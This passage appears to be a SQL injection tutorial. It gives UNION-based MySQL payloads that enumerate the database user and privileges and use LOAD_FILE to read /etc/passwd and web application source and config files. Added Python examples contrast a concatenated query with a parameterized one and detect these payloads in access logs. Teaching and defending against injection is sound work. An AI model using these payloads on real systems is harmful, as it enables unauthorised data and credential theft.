Reading Files
DB User
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
Our UNION injection payload will be as follows:
cn' UNION SELECT 1, user(), 3, 4-- -
or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
This tells us our current user, which in this case is root:

User Privileges
SELECT super_priv FROM mysql.user
Once again, we can use the following payload with the above query:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
If we had many users within the DBMS, we can add WHERE user="root" to only show privileges for our current user root:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

The query returns Y, which means YES, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
From here, we can add WHERE grantee="'root'@'localhost'" to only show our current user root privileges. Our payload would be:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
And we see all of the possible privileges given to our current user:
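To show why the four-column UNION payloads above work and what stops them, here is an added example (not part of the original page) in Python. An in-memory SQLite database stands in for the MySQL backend: a constructed ports table with four columns, a constructed app_users table that plays the role of mysql.user, and two versions of the search query, one built by string concatenation and one parameterized. The table and column names are assumptions; the payload follows the page's "user FROM mysql.user" shape with the constructed table name.

```python
import sqlite3

# Constructed in-memory schema standing in for the application's MySQL backend.
# Table and column names are assumptions, not the page's real schema.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ports(code TEXT, city TEXT, volume INTEGER, region TEXT)")
    con.executemany("INSERT INTO ports VALUES (?, ?, ?, ?)", [
        ("cn", "Shanghai", 100, "asia"),
        ("de", "Hamburg", 40, "europe"),
    ])
    # Plays the role of mysql.user (user and super_priv columns) for the demonstration.
    con.execute("CREATE TABLE app_users(user TEXT, super_priv TEXT)")
    con.execute("INSERT INTO app_users VALUES ('root', 'Y')")
    return con

def search_vulnerable(con, term):
    # The user-supplied term is pasted into the SQL text. A quote in the term
    # closes the string literal and everything after it is parsed as SQL.
    sql = f"SELECT code, city, volume, region FROM ports WHERE code = '{term}'"
    return con.execute(sql).fetchall()

def search_parameterized(con, term):
    # The term travels as a bound value; the SQL text is fixed, so the quote
    # and the UNION are compared against the code column as plain characters.
    sql = "SELECT code, city, volume, region FROM ports WHERE code = ?"
    return con.execute(sql, (term,)).fetchall()

# The page's four-column UNION shape, selecting the user and privilege columns.
PAYLOAD = "cn' UNION SELECT 1, user, 3, super_priv FROM app_users-- -"

def demo():
    con = build_db()
    leaked = search_vulnerable(con, PAYLOAD)
    safe = search_parameterized(con, PAYLOAD)
    return leaked, safe

if __name__ == "__main__":
    leaked, safe = demo()
    print("concatenated query returned:", leaked)   # includes (1, 'root', 3, 'Y')
    print("parameterized query returned:", safe)    # []
```

The concatenated version returns the legitimate "cn" row plus a second row carrying the user name and privilege flag, exactly the leak the page describes; the parameterized version returns nothing because the whole payload is matched as a literal code value.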

LOAD_FILE
SELECT LOAD_FILE('/etc/passwd');
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
Similar to how we have been using a UNION injection, we can use the above query:
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Another Example
We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php:
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting [Ctrl + U].
' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -
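From the defender's side, the LOAD_FILE and privilege-enumeration requests above leave a distinctive trace in the web server's access log. The following added example (not part of the original page) is a small Python detector that URL-decodes the request target of each log line (up to twice, to catch double encoding) and flags the indicators used on this page: UNION ... SELECT, LOAD_FILE(, mysql.user, information_schema.user_privileges and user()/current_user(). The log lines are constructed for the example and the /search.php?port_code= path is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the queries shown on this page (matched case-insensitively).
INDICATORS = [
    ("union_select",    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("load_file",       re.compile(r"\bload_file\s*\(", re.I)),
    ("mysql_user",      re.compile(r"\bmysql\.user\b", re.I)),
    ("user_privileges", re.compile(r"\binformation_schema\.user_privileges\b", re.I)),
    ("current_user",    re.compile(r"\b(current_)?user\s*\(\s*\)", re.I)),
]

def decode_twice(s):
    # Decode up to two layers of URL encoding; stop early once the text is stable.
    for _ in range(2):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s

def classify_request(line):
    """Return the indicator names found in one access-log line (empty if benign)."""
    m = re.search(r'"(?:GET|POST) (\S+)', line)
    target = decode_twice(m.group(1)) if m else decode_twice(line)
    return [name for name, rx in INDICATORS if rx.search(target)]

def scan(log_text):
    """Return (line_number, indicators) for every line that triggers an indicator."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify_request(line)
        if hits:
            findings.append((n, hits))
    return findings

# Constructed access-log lines: one benign search, three injection attempts
# (the third is double-encoded), and a benign query that merely contains "union".
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search.php?port_code=cn HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?port_code=cn%27%20UNION%20SELECT%201%2C%20user()%2C%203%2C%204--%20- HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?port_code=cn%27%20UNION%20SELECT%201%2C%20LOAD_FILE(%22/etc/passwd%22)%2C%203%2C%204--%20- HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:00:14 +0000] "GET /search.php?port_code=cn%2527%2520UNION%2520SELECT%25201%252C%2520super_priv%252C%25203%252C%25204%2520FROM%2520mysql.user--%2520- HTTP/1.1" 200 600
10.0.0.7 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?port_code=union%20station HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Alerting on these patterns is a stopgap; the durable fixes are the parameterized query on the application side and, on the database side, running the application under an account without the FILE privilege and leaving secure_file_priv set so that LOAD_FILE cannot read arbitrary paths even if an injection gets through.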
